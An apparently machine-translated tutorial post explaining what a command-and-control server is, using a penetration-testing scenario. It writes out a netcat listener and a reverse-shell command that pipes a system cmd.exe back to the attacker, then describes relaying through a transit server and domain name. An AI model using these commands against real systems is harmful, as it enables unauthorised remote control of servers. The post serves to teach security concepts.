Hacking Book | Free Online Hacking Learning


easy to understand what a c & c server is

Posted by bassolino at 2020-02-26

People often read articles on malware analysis or reports on botnets and often see words about C & C server, but what is this C & C server? Today's topic is to make it easy for you to understand what a C & C server is.

The full name of C & C server is command and control server, which translates into command and control server. What's the use of it?

Usually, when we do penetration testing, when we get a webshell, we need to carry out the right lifting operation on the server. If it is a Windows Server, the right lifting usually uses the exp of the local right lifting vulnerability to carry out the overflow right lifting. Some Exps can directly add parameters after the overflow, and execute the commands in the parameters after the overflow is successful, while some Exps After the overflow is successful, a CMD with system permission is returned. In this case, we need to bounce the CMD shell with low permission back to the local. Here, we use NC to execute locally:

nc -vv -lp 3333

The above command means to listen to a 3333 port waiting for connection locally. Suppose that your computer IP is public network and the IP is, then you can execute it on the target server:

nc 3333 -e cmd.exe

The above command can return the CMD shell of the server permission of the remote server to the local area. At this time, you can communicate through the shell established by NC, send the command you want to execute, execute after the remote server receives the command and return the result to you. At this time, your local computer is a simple C & C The server, as shown in the figure, simply explains the above process:

In this extension, if your local computer is in the intranet, without public IP, and the target server is also in the intranet, then the target cannot directly connect to your local computer through the IP address, what should we do?

Generally, a public IP is required in this process. Only in this way can the internal server access and connect. Therefore, we can use a transit server, which has a public IP The address is:, so that both the target server and our local computer can access the transit server. The transit server is used to map the port monitored by the host in our local intranet to a port of the public IP, so that the port monitored by the target computer accessing the transit server is equivalent to the port monitored by us.

Speaking of this, let's extend it again. Because the IP address changes with the change of the transit server, each IP change will cause the whole process to be operated again, and each command statement will be modified. What can we do to solve this problem?

Of course, the domain name that we often use is involved here. Change the IP address in the above statement to our registered domain name, and then resolve the domain name to our transit server, so that even if we change the transit server, we do not need to change the executed command.

The whole process above is the evolution history of a simple C & C server. Generally, the article we see on the network says the IP address or domain name of the C & C server. The C & C server here refers to the above transit server. Why is the transit server not the local host?

That's because the transfer server is the direct connection server of malware and Botnet, and it is the most direct contact server. Usually, when analyzing malware or Botnet, it is analyzed first. All the instructions sent by the controller are sent to the target server through the transfer server. So far, welcome to leave a message for discussion.

Recommended reading

Let's talk about penetration testing

Easy to understand what is webshell

Easy to understand what SQL injection is